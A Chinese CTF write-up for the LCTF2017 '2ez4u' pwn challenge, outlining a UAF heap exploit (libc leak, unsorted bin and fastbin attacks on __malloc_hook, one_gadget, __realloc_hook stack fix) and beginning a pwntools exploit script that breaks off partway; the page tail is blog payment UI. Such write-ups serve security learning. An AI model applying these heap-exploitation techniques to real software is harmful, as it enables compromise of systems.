LCTF2017-2ez4u writeup 另一种思路

之前没怎么用过largebin attack,于是搜了下题来做
审计了下,有个UAF漏洞,PIE开了,能打印,那跟fengshui那题差不多了

于是骚操作了一波,leak出libc基址,unsorted bin attack攻击malloc_hook上的位置,其实这里攻击free_hook上面的也是可以的,然后fastbin attack直接控制_malloc_hook,填one_gadget,发现get不到shell,那用_realloc_hook修一下栈,get shell
全程都是用fastbin attack和unsorted bin attack,large bin attack完全没用………还是要看下官方的思路,学习一下

下面是payload

from pwn import *

debug=1

context.log_level='debug'
context.arch='amd64'
e=ELF('./libc.so')

if debug:
    p=process('./2ez4u',env={
  'LD_PRELOAD':'./libc.so'})
    gdb.attach(p)
else:
    p=remote('',)

def ru(x):
    return p.recvuntil(x)

def se(x):
    p.send(x)

def add(color,value,num,length,content):
    se('1\n')
    ru('color?(0:red, 1:green):')
    se(str(color)+'\n&
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值